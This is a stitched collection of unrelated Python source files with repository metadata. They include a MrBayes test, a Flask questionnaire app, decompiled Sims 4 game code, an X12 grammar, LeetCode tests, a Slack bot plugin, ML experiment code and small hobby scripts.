print "3: remaining in le_u: ", le_u, "keys: ", d[le_u]['od']
le_key = Decimal('Infinity')
if d[u]['od'].keys()[0] is not None:
le_key = d[le_u]['od'].keys()[0]
continue
#print "3. ", le_key
#print "4. ", le_key, le_u
#print "5. ", d[le_u]
v = d[le_u]['od'][le_key][0]
#print "6. ", le_u, v, le_key
return le_u, v, le_key
'''
| [
"aubin.sanyal@gmail.com"
] | aubin.sanyal@gmail.com |
feb3861b0c0a06a508fdf4a0748c05fe0b8f72be | 0f00c8a02e8dc1d8136b2afc92338108f92cc6ae | /recipes/mrbayes/run_test.py | 40033ea2ed9721ad50dfc69b067eccb43cef93ff | [] | no_license | faircloth-lab/conda-recipes | 3714f5be83753261bf3abc70454bdf6b7028c8d6 | 75a520a75a357ea47ee80262f3c3a6dfe1b0715f | refs/heads/master | 2021-01-20T07:07:05.705307 | 2015-06-16T13:50:18 | 2015-06-16T13:50:18 | 12,671,015 | 2 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
(c) 2013 Brant Faircloth || http://faircloth-lab.org/
All rights reserved.
This code is distributed under a 3-clause BSD license. Please see
LICENSE.txt for more information.
Created on 30 December 2013 16:33 PST (-0800)
"""
import unittest
import subprocess
class TestMb(unittest.TestCase):
def test_mb(self):
cmd = ["mb", "-h"]
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
self.stdout, self.stderr = proc.communicate()
text = [v.strip() for k, v in enumerate(self.stdout.split("\n"))
if k in range(0, 6, 2)]
assert text == [
'',
'MrBayes v3.2.2 x64',
'(Bayesian Analysis of Phylogeny)'
]
class TestMbMpi(unittest.TestCase):
def test_mb(self):
cmd = ["mb-mpi", "-h"]
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
self.stdout, self.stderr = proc.communicate()
text = [v.strip() for k, v in enumerate(self.stdout.split("\n"))
if k in range(0, 6, 2)]
assert text == [
'MrBayes v3.2.2 x64',
'(Bayesian Analysis of Phylogeny)',
'(Parallel version)'
]
if __name__ == '__main__':
unittest.main()
| [
"brant@faircloth-lab.org"
] | brant@faircloth-lab.org |
e134d1f0bece4a5e209fd10eaedcb6493c8f17b2 | e67b0c01d7244f1c635d7c2e12157076bcd2efbc | /finalproject/app.py | c4341f5d265bdc737da29944cf08361513cc42c2 | [] | no_license | SonjaGrusche/LPTHW | 0a7de74101db1b0ae62ffc35d4fac990c894ae14 | 12483e97373c9e0aa9e8785b20bb34e1e5b4b36a | refs/heads/master | 2021-01-12T15:52:06.404665 | 2017-03-21T10:27:53 | 2017-03-21T10:27:53 | 71,830,953 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,293 | py | from flask import Flask, session, request
from flask import url_for, redirect, render_template
from random import randint
import resources
app = Flask(__name__)
@app.route('/', methods=['GET'])
def start_get():
return render_template('start.html')
@app.route('/questionnaire', methods=['GET'])
def questionnaire_get():
return render_template('questionnaire.html', questions=resources.questions)
@app.route('/questionnaire', methods=['POST'])
def questionnaire_post():
totals = 0
for i in range(1, 11):
try:
totals += int(request.form.get('question' + str(i)))
except TypeError:
return render_template('questionnaire.html', questions=resources.questions, error=1)
return redirect(url_for('result', total=totals+20))
@app.route('/result/<int:total>')
def result(total):
if total in range(0, 10):
type = 0
elif total in range(10, 20):
type = 1
elif total in range(20, 26):
type = 2
elif total in range(26, 30):
type = 3
elif total in range(30, 33):
type = 4
website = resources.links[type][randint(0, len(resources.links[type])-1)]
return render_template('results.html', site=website)
app.secret_key = '1234supersecret'
if __name__ == "__main__":
app.run()
| [
"sonja.grusche@stud.leuphana.de"
] | sonja.grusche@stud.leuphana.de |
4fafdb60d2714fc699c55d2ce9bc473bfcffb686 | b3b68efa404a7034f0d5a1c10b281ef721f8321a | /Scripts/simulation/situations/complex/university_mixer_situation.py | bdd94a7c82a8c319385d8ae99bf8517a96e6a57b | [
"Apache-2.0"
] | permissive | velocist/TS4CheatsInfo | 62195f3333076c148b2a59f926c9fb5202f1c6fb | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | refs/heads/main | 2023-03-08T01:57:39.879485 | 2021-02-13T21:27:38 | 2021-02-13T21:27:38 | 337,543,310 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,087 | py | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\situations\complex\university_mixer_situation.py
# Compiled at: 2019-10-19 01:32:53
# Size of source mod 2**32: 5699 bytes
from situations.situation_complex import SituationComplex, CommonInteractionCompletedSituationState, CommonSituationState, SituationComplexCommon, TunableSituationJobAndRoleState, SituationStateData
from sims4.tuning.tunable import TunableReference, TunableEnumWithFilter
from tag import Tag
import services
from objects.object_manager import ObjectManager
from sims4.tuning.instances import lock_instance_tunables
from situations.bouncer.bouncer_request import exclusivity_compare
from situations.bouncer.bouncer_types import BouncerExclusivityCategory
from situations.situation_types import SituationCreationUIOption
from situations.situation import Situation
class _MixerParty(CommonSituationState):
def timer_expired(self):
self._change_state(self.owner.cleanup_party_state())
def on_activate(self, reader=None):
super().on_activate(reader)
if self.owner.juice_keg is not None:
self.owner._claim_object(self.owner.juice_keg.id)
class _CleanupJuiceKeg(CommonInteractionCompletedSituationState):
def on_activate(self, reader=None):
super().on_activate(reader)
if self.owner.juice_keg is None:
self.owner._self_destruct()
def _on_interaction_of_interest_complete(self, **kwargs):
self.owner._self_destruct()
class _SetupJuiceKeg(CommonInteractionCompletedSituationState):
def _on_interaction_of_interest_complete(self, **kwargs):
self._change_state(self.owner.mixer_party_state())
class UniversityMixerPartySituation(SituationComplexCommon):
INSTANCE_TUNABLES = {'juice_keg_bearer_job_and_role':TunableSituationJobAndRoleState(description='\n The job and role state for the bearer of the juice keg.\n '),
'setup_juice_keg_state':_SetupJuiceKeg.TunableFactory(description='\n The state to bring in the keg bearer and have the juice keg set up on the lot.\n ',
display_name='1. Setup Juice Keg State',
tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP),
'mixer_party_state':_MixerParty.TunableFactory(description='\n The state to represent the party itself.\n ',
display_name='2. Mixer Party State',
tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP),
'cleanup_party_state':_CleanupJuiceKeg.TunableFactory(description='\n The state to cleanup the juice keg and end the party\n ',
display_name='3. Party Cleanup State',
tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP),
'juice_keg_tag':TunableEnumWithFilter(description='\n Tag used to find the juice keg supplied by the situation.\n ',
tunable_type=Tag,
default=Tag.INVALID,
invalid_enums=Tag.INVALID,
filter_prefixes=('func', ))}
REMOVE_INSTANCE_TUNABLES = Situation.NON_USER_FACING_REMOVE_INSTANCE_TUNABLES
def __init__(self, *args, **kwargs):
(super().__init__)(*args, **kwargs)
self._juice_keg_object_id = None
def start_situation(self):
super().start_situation()
if self.juice_keg is not None:
self._claim_object(self.juice_keg.id)
self._change_state(self.setup_juice_keg_state())
@classmethod
def _states(cls):
return (SituationStateData(1, _SetupJuiceKeg, factory=(cls.setup_juice_keg_state)),
SituationStateData(2, _MixerParty, factory=(cls.mixer_party_state)),
SituationStateData(3, _CleanupJuiceKeg, factory=(cls.cleanup_party_state)))
@classmethod
def _get_tuned_job_and_default_role_state_tuples(cls):
return [(cls.juice_keg_bearer_job_and_role.job, cls.juice_keg_bearer_job_and_role.role_state)]
@classmethod
def default_job(cls):
pass
@property
def juice_keg(self):
object_manager = services.object_manager()
juice_keg = None
if self._juice_keg_object_id is not None:
juice_keg = object_manager.get(self._juice_keg_object_id)
if juice_keg is None:
if self.juice_keg_bearer is not None:
for obj in object_manager.get_objects_with_tag_gen(self.juice_keg_tag):
if obj.get_sim_owner_id() is self.juice_keg_bearer.id:
juice_keg = obj
self._juice_keg_object_id = juice_keg.id
break
return juice_keg
@property
def juice_keg_bearer(self):
sim = next(self.all_sims_in_job_gen(self.juice_keg_bearer_job_and_role.job), None)
return sim
lock_instance_tunables(UniversityMixerPartySituation, exclusivity=(BouncerExclusivityCategory.NORMAL),
creation_ui_option=(SituationCreationUIOption.NOT_AVAILABLE)) | [
"cristina.caballero2406@gmail.com"
] | cristina.caballero2406@gmail.com |
291145b4c5ed899fc48d811be2dd62caa2b32b4a | 62e58c051128baef9452e7e0eb0b5a83367add26 | /x12/4010/819004010.py | 23f27f88966ad294e1ec85c55e27af7395e422d6 | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 1,730 | py | from bots.botsconfig import *
from records004010 import recorddefs
syntax = {
'version' : '00403', #version of ISA to send
'functionalgroup' : 'JB',
}
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BOS', MIN: 1, MAX: 1},
{ID: 'CUR', MIN: 0, MAX: 1},
{ID: 'ITD', MIN: 0, MAX: 5},
{ID: 'N1', MIN: 0, MAX: 10, LEVEL: [
{ID: 'N2', MIN: 0, MAX: 2},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
{ID: 'REF', MIN: 0, MAX: 12},
{ID: 'MSG', MIN: 0, MAX: 12},
{ID: 'PER', MIN: 0, MAX: 3},
]},
{ID: 'JIL', MIN: 1, MAX: 10000, LEVEL: [
{ID: 'PID', MIN: 0, MAX: 99999},
{ID: 'REF', MIN: 0, MAX: 12},
{ID: 'MSG', MIN: 0, MAX: 12},
{ID: 'MEA', MIN: 0, MAX: 10},
{ID: 'ITA', MIN: 0, MAX: 10},
{ID: 'PSA', MIN: 0, MAX: 1},
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'JID', MIN: 0, MAX: 1000, LEVEL: [
{ID: 'PID', MIN: 0, MAX: 99999},
{ID: 'DTM', MIN: 0, MAX: 10},
{ID: 'REF', MIN: 0, MAX: 12},
{ID: 'MSG', MIN: 0, MAX: 12},
{ID: 'MEA', MIN: 0, MAX: 5},
]},
]},
{ID: 'AMT', MIN: 1, MAX: 1},
{ID: 'QTY', MIN: 0, MAX: 5},
{ID: 'TDS', MIN: 0, MAX: 1},
{ID: 'PSA', MIN: 0, MAX: 1000, LEVEL: [
{ID: 'N1', MIN: 0, MAX: 1},
{ID: 'N2', MIN: 0, MAX: 2},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'REF', MIN: 0, MAX: 12},
{ID: 'PER', MIN: 0, MAX: 3},
]},
{ID: 'CTT', MIN: 1, MAX: 1},
{ID: 'SE', MIN: 1, MAX: 1},
]}
]
| [
"jason.capriotti@gmail.com"
] | jason.capriotti@gmail.com |
55c13d8cf177119f3b0b4ac0b18bc121cc4f8d62 | f64e31cb76909a6f7fb592ad623e0a94deec25ae | /tests/test_p1494_parallel_courses_ii.py | dbf8cbae087e98cebaed176c651d916aaa595833 | [] | no_license | weak-head/leetcode | 365d635cb985e1d154985188f6728c18cab1f877 | 9a20e1835652f5e6c33ef5c238f622e81f84ca26 | refs/heads/main | 2023-05-11T14:19:58.205709 | 2023-05-05T20:57:13 | 2023-05-05T20:57:13 | 172,853,059 | 0 | 1 | null | 2022-12-09T05:22:32 | 2019-02-27T05:58:54 | Python | UTF-8 | Python | false | false | 1,391 | py | # flake8: noqa: F403, F405
import pytest
from leetcode.p1494_parallel_courses_ii import *
solutions = [
minNumberOfSemesters,
]
test_cases = [
(
[
13,
[
[12, 8],
[2, 4],
[3, 7],
[6, 8],
[11, 8],
[9, 4],
[9, 7],
[12, 4],
[11, 4],
[6, 4],
[1, 4],
[10, 7],
[10, 4],
[1, 7],
[1, 8],
[2, 7],
[8, 4],
[10, 8],
[12, 7],
[5, 4],
[3, 4],
[11, 7],
[7, 4],
[13, 4],
[9, 8],
[13, 8],
],
9,
],
3,
),
([4, [[2, 1], [3, 1], [1, 4]], 2], 3),
([5, [[2, 1], [3, 1], [4, 1], [1, 5]], 2], 4),
([11, [], 2], 6),
([11, [], 1], 11),
([11, [], 3], 4),
([11, [], 6], 2),
([11, [], 8], 2),
([11, [], 10], 2),
([11, [], 11], 1),
([11, [], 12], 1),
]
@pytest.mark.timeout(2)
@pytest.mark.parametrize(("args", "expectation"), test_cases)
@pytest.mark.parametrize("solution", solutions)
def test_solution(args, expectation, solution):
assert solution(*args) == expectation
| [
"zinchenko@live.com"
] | zinchenko@live.com |
b341b840a33dfd2e49d09afbc302f4239a84611c | b983d66bb053966d46b7ff0cc7bea4142d8fe852 | /src/states.py | ca19928ba363470c4fd331d5e211ff3a03e33dbe | [
"MIT"
] | permissive | povle/vk-engineers | d4104c39c1846bc5b4250702b0da486bc8e01645 | bff0c3ac244dffc79baeed423db5a5dc814f04b8 | refs/heads/master | 2023-07-28T06:52:36.184954 | 2021-09-07T21:15:44 | 2021-09-07T21:15:44 | 305,855,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 443 | py | class StateError(Exception):
pass
USER_NEW = 'user_new'
USER_INIT = 'user_init'
USER_DEFAULT = 'user_default'
ADMIN_DEFAULT = 'admin_default'
ADMIN_BROADCAST_GROUP_SELECTION = 'admin_broadcast_group_selection'
ADMIN_MESSAGE_INPUT = 'admin_message_input'
ADMIN_RECEIVER_GROUP_SELECTION = 'admin_receiver_group_selection'
ADMIN_RECEIVER_SELECTION = 'admin_receiver_selection'
ADMIN_UNREAD_GROUP_SELECTION = 'admin_unread_group_selection'
| [
"pasha@blinov.co"
] | pasha@blinov.co |
172e416bfd9fae185c8298b4930fcd1fbb386ef6 | 8625b3616fa4a8aaf836c26e344bb39552a13c7b | /plugins/reactionCounterPlugin.py | 475ba07ec02c9f2bc78e4c15fc71888a5890a772 | [
"MIT"
] | permissive | Avishek-Paul/SlackAssistant | 06fa2049676206833aa661487d10518c03ea9466 | 4cb41fe62526dc26381c6ca6bc420b1104a8da2f | refs/heads/master | 2023-01-08T08:41:43.910145 | 2020-11-11T01:10:05 | 2020-11-11T01:10:05 | 311,824,817 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,564 | py | import config
from slackclient import SlackClient
class reactionCounterPlugin:
def __init__(self):
self.keywords = ['!rankings', '!Rankings', '!ranking', '!Ranking', 'reactionBased']
self.client = SlackClient(config.bot_token)
self.db = config.mongoClient
def execute(self, event):
if event['type'] == 'message':
message = event.get("text", "")
if len(message.split()) > 1:
num = int(message.split()[1])
maxGiversRaw = self.db.find(sort=[('given', -1)])
maxReceiversRaw = self.db.find(sort=[('received', -1)])
mGBase = "The #{} reactor is <@{}> with {} reacts given.\n"
mRBase = "The #{} reacted is <@{}> with {} reacts received.\n"
m1 = ""
m2 = ""
for i in range(num):
try:
gItem = maxGiversRaw[i]
rItem = maxReceiversRaw[i]
m1 += mGBase.format(i+1, gItem['user_id'], gItem['given'])
m2 += mRBase.format(i+1, rItem['user_id'], rItem['received'])
except:
break
else:
maxGiverRaw = self.db.find_one(sort=[('given', -1)])
maxReceiverRaw = self.db.find_one(sort=[('received', -1)])
m1 = "The #1 reactor is <@{}> with {} reacts given.\n".format(maxGiverRaw['user_id'], maxGiverRaw['given'])
m2 = "The #1 reacted is <@{}> with {} reacts received.\n".format(maxReceiverRaw['user_id'], maxReceiverRaw['received'])
self.client.api_call("chat.postMessage", thread_ts=event['ts'], channel=event['channel'], text="```{}```".format(m1))
self.client.api_call("chat.postMessage", thread_ts=event['ts'], channel=event['channel'], text="```{}```".format(m2))
elif event['type'] == 'reaction_added': #or event['type'] == 'reaction_removed':
self.updateCounter(event, 1)
elif event['type'] == 'reaction_removed':
self.updateCounter(event, -1)
def updateCounter(self, event, val):
reaction = event['reaction']
channel = event['item']['channel']
reactor = event['user'] #react giver
reacted = event['item_user'] #react receiver
if reactor == reacted:
return
reactorRaw = self.client.api_call("users.info", user=reactor)
reactedRaw = self.client.api_call("users.info", user=reacted)
reactorReal = reactorRaw['user']['real_name']
reactorDisplay = reactorRaw['user']['profile']['display_name']
reactedReal = reactedRaw['user']['real_name']
reactedDisplay = reactedRaw['user']['profile']['display_name']
#increment the reactor
self.db.update_one({'user_id' : reactor},
{
'$set' : {'display' : reactorDisplay, 'real': reactorReal},
'$inc' : {'given' : val}
},
upsert=True)
#increments the reacted
self.db.update_one({'user_id' : reacted},
{
'$set' : {'display' : reactedDisplay, 'real': reactedReal},
'$inc' : {'received' : val}
},
upsert=True) | [
"avishek97paul@gmail.com"
] | avishek97paul@gmail.com |
9e783b4e701f26b5c214da0138af22e4c3c66562 | f2ac9260dfa7483cd54a30700bb952e10acbc1bb | /fit_lr.py | 27c2ea1089ad19bf4212c6e4d9de0bab81cb012f | [] | no_license | kudkudak/compound-activity-prediction | 94dd9efd2ff7ba5c95ebb71ce1766eb6b8882aac | d55e6ecb4e3de74d40b1a37950449f60df1a2ca4 | refs/heads/master | 2016-09-15T21:35:54.930142 | 2015-01-14T13:09:19 | 2015-01-14T13:09:19 | 27,130,096 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,056 | py | from misc.utils import *
from misc.experiment_utils import get_exp_options, print_exp_header, \
save_exp, get_exp_logger, generate_configs, print_exp_name
from data_api import prepare_experiment_data, prepare_experiment_data_embedded, get_raw_training_data
from sklearn.metrics import matthews_corrcoef, accuracy_score, confusion_matrix
from sklearn.neighbors import KNeighborsClassifier
from sklearn.preprocessing import MinMaxScaler
import sklearn.linear_model
def fit_lrs(config_in = None):
#### Load config and data ####
config = {"protein":0, "fingerprint":4,"n_folds":10,
"use_embedding": 1, "K":20, "max_hashes":1000, "seed":0, "C_min":-3, "C_max":7}
if config_in is None:
config.update(get_exp_options(config))
else:
config.update(config_in)
D, config_from_data = prepare_experiment_data_embedded(n_folds=10, seed=config["seed"], K=config["K"], \
max_hashes=config["max_hashes"],
protein=config["protein"], fingerprint=config["fingerprint"])
config.update(config_from_data)
config["C"] = [10.0**(i/float(2)) for i in range(2*config["C_min"],2*(1+config["C_max"]))]
print config["C"]
logger = get_exp_logger(config)
### Prepare experiment ###
E = {"config": config, "experiments":[]}
def fit_lr(config):
### Prepare result holders ###b
values = {}
results = {}
monitors = {}
E = {"config": config, "results": results, "monitors":monitors, "values":values}
### Print experiment header ###
print_exp_name(config)
### Train ###
monitors["acc_fold"] = []
monitors["mcc_fold"] = []
monitors["wac_fold"] = []
monitors["cm"] = [] # confusion matrix
monitors["clf"] = []
monitors["train_time"] = []
monitors["test_time"] = []
results["mean_acc"] = 0
results["mean_mcc"] = 0
values["transformers"] = []
for fold in D["folds"]:
X_train, Y_train, X_test, Y_test = fold["X_train"], fold["Y_train"], fold["X_test"], fold["Y_test"]
min_max_scaler = MinMaxScaler()
X_train = min_max_scaler.fit_transform(X_train)
X_test = min_max_scaler.transform(X_test)
clf =sklearn.linear_model.LogisticRegression (C=config["C"], class_weight="auto")
tstart = time.time()
monitors["train_time"].append(time.time() - tstart)
clf.fit(X_train.astype(float), Y_train.astype(float).reshape(-1))
tstart = time.time()
Y_pred = clf.predict(X_test.astype(float))
monitors["test_time"].append(time.time() - tstart)
acc_fold, mcc_fold = accuracy_score(Y_test, Y_pred), matthews_corrcoef(Y_test, Y_pred)
cm = confusion_matrix(Y_test, Y_pred)
tp, fn, fp, tn = cm[1,1], cm[1,0], cm[0,1], cm[0,0]
monitors["clf"].append(clf)
monitors["cm"].append(cm)
monitors["wac_fold"].append(0.5*tp/float(tp+fn) + 0.5*tn/float(tn+fp))
monitors["acc_fold"].append(acc_fold)
monitors["mcc_fold"].append(mcc_fold)
monitors["acc_fold"] = np.array(monitors["acc_fold"])
monitors["mcc_fold"] = np.array(monitors["mcc_fold"])
monitors["wac_fold"] = np.array(monitors["wac_fold"])
results["mean_acc"] = monitors["acc_fold"].mean()
results["mean_mcc"] = monitors["mcc_fold"].mean()
results["mean_wac"] = monitors["wac_fold"].mean()
logger.info(results)
return E
cv_configs = generate_configs(config, ["C"])
for c in cv_configs:
print c
E["experiments"].append(fit_lr(c))
save_exp(E)
best_e = E["experiments"][0]
for e in E["experiments"]:
if e["results"]["mean_wac"] > best_e["results"]["mean_wac"]:
best_e = e
logger.info(best_e)
logger.info("Done")
if __name__ == "__main__":
fit_lrs()
| [
"staszek.jastrzebski@gmail.com"
] | staszek.jastrzebski@gmail.com |
9f0e3f8373e8127285738a76f06d09c19699634c | 7a3dec909e1a36622c66a743968a631644a1e830 | /src/uploaders/tests/test_xml_uploader.py | 2609bba6e75a537948f5c989832786ccf1820c27 | [
"MIT"
] | permissive | fares-data-build-tool/fdbt-reference-data-service | c8388e2f7912e3ef678968efb876935d3aa438e3 | d60506edf24c723a7d56a7ff7b6586f1c1e9989d | refs/heads/develop | 2021-07-19T13:26:33.707021 | 2021-04-22T15:10:02 | 2021-04-22T15:10:02 | 247,682,844 | 2 | 0 | MIT | 2021-04-28T10:56:41 | 2020-03-16T11:16:35 | Python | UTF-8 | Python | false | false | 3,533 | py | import os
from unittest.mock import patch, MagicMock
import boto3
from txc_uploader.txc_processor import download_from_s3_and_write_to_db, extract_data_for_txc_operator_service_table, collect_journey_pattern_section_refs_and_info, collect_journey_patterns, iterate_through_journey_patterns_and_run_insert_queries
from tests.helpers import test_xml_helpers
from tests.helpers.test_data import test_data
mock_data_dict = test_xml_helpers.generate_mock_data_dict()
class TestDatabaseInsertQuerying:
@patch('txc_uploader.txc_processor.insert_into_txc_journey_pattern_link_table')
@patch('txc_uploader.txc_processor.insert_into_txc_journey_pattern_table')
def test_insert_methods_are_called_correct_number_of_times(self, mock_jp_insert, mock_jpl_insert):
service = mock_data_dict['TransXChange']['Services']['Service']
mock_journey_patterns = collect_journey_patterns(
mock_data_dict, service)
mock_jp_insert.side_effect = [
9, 27, 13, 1, 11, 5, 28, 12, 10, 6, 13, 27, 4]
mock_cursor = MagicMock()
mock_op_service_id = 12
iterate_through_journey_patterns_and_run_insert_queries(
mock_cursor, mock_data_dict, mock_op_service_id, service)
assert mock_jp_insert.call_count == len(mock_journey_patterns)
assert mock_jpl_insert.call_count == len(mock_journey_patterns)
class TestDataCollectionFunctionality:
def test_extract_data_for_txc_operator_service_table(self):
expected_operator_and_service_info = (
'ANWE', '2018-01-28', 'ANW', 'Macclesfield - Upton Priory Circular', 'NW_01_ANW_4_1', 'Macclesfield', 'Macclesfield')
operator = mock_data_dict['TransXChange']['Operators']['Operator']
service = mock_data_dict['TransXChange']['Services']['Service']
assert extract_data_for_txc_operator_service_table(
operator, service) == expected_operator_and_service_info
def test_collect_journey_pattern_section_refs_and_info(self):
mock_raw_journey_patterns = mock_data_dict['TransXChange'][
'Services']['Service']['StandardService']['JourneyPattern']
assert collect_journey_pattern_section_refs_and_info(
mock_raw_journey_patterns) == test_data.expected_list_of_journey_pattern_section_refs
def test_collect_journey_patterns(self):
service = mock_data_dict['TransXChange']['Services']['Service']
assert collect_journey_patterns(
mock_data_dict, service) == test_data.expected_list_of_journey_patterns
class TestMainFunctionality:
@patch('txc_uploader.txc_processor.write_to_database')
def test_integration_between_s3_download_and_database_write_functionality(self, db_patch, s3, cloudwatch):
dir_path = os.path.dirname(os.path.realpath(__file__))
mock_file_dir = dir_path + '/helpers/test_data/mock_txc.xml'
mock_bucket = 'test-bucket'
mock_key = 'tnds/WM/test-key'
db_connection = MagicMock()
logger = MagicMock()
conn = boto3.resource('s3', region_name='eu-west-2')
# pylint: disable=no-member
conn.create_bucket(Bucket=mock_bucket)
s3.put_object(Bucket=mock_bucket, Key=mock_key,
Body=open(mock_file_dir, 'rb'))
download_from_s3_and_write_to_db(
s3, cloudwatch, mock_bucket, mock_key, mock_file_dir, db_connection, logger)
db_patch.assert_called_once_with(
mock_data_dict, 'WM', 'tnds', mock_key, db_connection, logger, cloudwatch)
| [
"noreply@github.com"
] | noreply@github.com |
364d6a8b4e45dedb56ee9f02ada48d814d3f2292 | 4ccc8d6e163b156e06a5c107a6a28681184a8a03 | /2021/day_05.py | 7f2b6f57581f3a8cc0b6db5b969eb1f474bb5c19 | [] | no_license | mmercedes/adventofcode | 798925a2b8403948c16d68b9e195c148d0a69b8a | 306cffadafb48863277295cf9ed56e95699d92e6 | refs/heads/master | 2022-01-01T09:25:38.974142 | 2021-12-14T18:33:07 | 2021-12-14T18:33:07 | 159,980,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,313 | py | #!/usr/bin/env python
import re
def lookup_insert(m, x, y):
if x not in m:
m[x] = {}
if y not in m[x]:
m[x][y] = 0
m[x][y] = m[x][y]+1
def insert_line(m, x1, y1, x2, y2):
dx = 1 if (x1 < x2) else -1
dy = 1 if (y1 < y2) else -1
i, j = (x1, y1)
lookup_insert(m, x2, y2)
while ((i != x2) or (j != y2)):
lookup_insert(m, i, j)
if (i != x2): i += dx
if (j != y2): j += dy
def day5():
p1_lookup = {}
p2_lookup = {}
with open("./inputs/input_05.txt") as f:
for line in f:
m = re.match(r"(?P<x1>[0-9]+),(?P<y1>[0-9]+) -> (?P<x2>[0-9]+),(?P<y2>[0-9]+)", line).groupdict()
x1, y1, x2, y2 = (int(m['x1']), int(m['y1']), int(m['x2']), int(m['y2']))
if (x1 == x2) or (y1 == y2):
insert_line(p1_lookup, x1, y1, x2, y2)
insert_line(p2_lookup, x1, y1, x2, y2)
p1_ans = 0
for x in p1_lookup:
for y in p1_lookup[x]:
if p1_lookup[x][y] > 1:
p1_ans += 1
p2_ans = 0
for x in p2_lookup:
for y in p2_lookup[x]:
if p2_lookup[x][y] > 1:
p2_ans += 1
print("p1 ans: %i" % p1_ans)
print("p2 ans: %i" % p2_ans)
day5()
| [
"matthewmercedes@gmail.com"
] | matthewmercedes@gmail.com |
97e53dbcc10f19ff3e71ee359e01ac2874a34773 | 0bdcbad65988ffa36a20e46228e39a55c5af3c47 | /src/get_files_not_in.py | b6c62ef31ce35ecaa9667b9b879ab6fc4b123093 | [
"MIT"
] | permissive | mpaloni/pioneer | abdc2d38eb79759aa2d9d5df6cc63c823ba74101 | c49efa2e071307b2534ca2abe7560f57683d2d9e | refs/heads/master | 2020-04-19T02:46:43.360350 | 2019-01-28T07:07:40 | 2019-01-28T07:07:40 | 167,914,384 | 0 | 0 | MIT | 2019-01-28T07:00:52 | 2019-01-28T07:00:51 | null | UTF-8 | Python | false | false | 1,637 | py |
import os
import argparse
import csv
import shutil
def main():
print("Started")
#define parameters
# parser = argparse.ArgumentParser(description='PIONEER Zeta')
# parser.add_argument('--first', type=str, help='Subject on the left side of the operator')
# parser.add_argument('--second', type=str, help='Subject on the right side of the operator')
# parser.add_argument('--third', type=str, default=None, help='Subject to apply the difference')
# parser.add_argument('--operator', type=str, help='Operator: minus or plus or both or avg')
# parser.add_argument('--source', type=str, default=None, help='Source directory')
# parser.add_argument('--target', type=str, default=None, help='Target directory')
# parser.add_argument('--intensify', type=str, default=None, help='Intensify the effect')
# parser.add_argument('--avg_keyword', type=str, default=None, help='Keyword to count the avg with. All and only files of interest should have this word in their name')
# args=parser.parse_args()
csv_path=os.path.expanduser("~/dippa/glasses.csv")
source=os.path.expanduser("~/dippa/img_align_celeba")
target=os.path.expanduser("~/dippa/celeba_noglasses/img")
src_files = os.listdir(source)
glasses=[]
with open(csv_path, 'r') as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='|')
for row in reader:
glasses.append(', '.join(row).replace('"', ''))
src_files = os.listdir(source)
for file_name in src_files:
full_file_name = os.path.join(source, file_name)
if (file_name not in glasses):
print("Shifting "+file_name+" to "+target)
shutil.copy(full_file_name, target)
main()
| [
"noreply@github.com"
] | noreply@github.com |
3e2e4ac2bfe11f943d6d864dc62bf236447cab5b | b8800f65c2955768b58c7d7fbd89647a644daed6 | /blog/models.py | b1d723e885fb9838448eac3c9471705c1f03e512 | [] | no_license | revianblue/my-first-blog | 791ae3db3f788a337c3db0986f11930eeff77e26 | a06af2e7f344e2e54be0ff677bfe403a721fea7e | refs/heads/master | 2021-01-20T01:04:46.380012 | 2017-04-24T13:38:10 | 2017-04-24T13:38:10 | 89,220,972 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 464 | py | from django.db import models
from django.utils import timezone
class Post(models.Model):
yazar = models.ForeignKey('auth.User')
baslik = models.CharField(max_length=200)
yazi = models.TextField()
yaratilma_tarihi = models.DateTimeField(default=timezone.now)
yayinlanma_tarihi = models.DateTimeField(blank=True, null=True)
def yayinla(self):
self.yayinlanma_tarihi = timezone.now()
self.save
def __str__(self):
return self.baslik
| [
"araserbilgin@gmail.com"
] | araserbilgin@gmail.com |
e19eeb31f0acad784dc3dad13eaa2bef568c94a5 | ed72d3f672d3298e9a2a4e9ff31915f9275bbf46 | /flight.py | a1043999b4044de661e6b6935f51b0bc6b746643 | [] | no_license | KirtMorgan/model_airport | 93810ceffce89ab670be7e10d1e0d44b7505e04e | e640a78e6afccb10f5f15646c696afd22027756a | refs/heads/master | 2020-05-17T00:03:51.525043 | 2019-04-29T14:30:19 | 2019-04-29T14:30:19 | 183,386,849 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,177 | py | from passenger import *
from plane import *
class Flight:
def __init__(self, origin_destination='', plane=''):
self.origin_destination = origin_destination
self.plane = plane
self.passengers_list = []
def add_plane(self, plane):
self.plane = plane
def add_origin_destination(self, origin_destination):
self.origin_destination = origin_destination
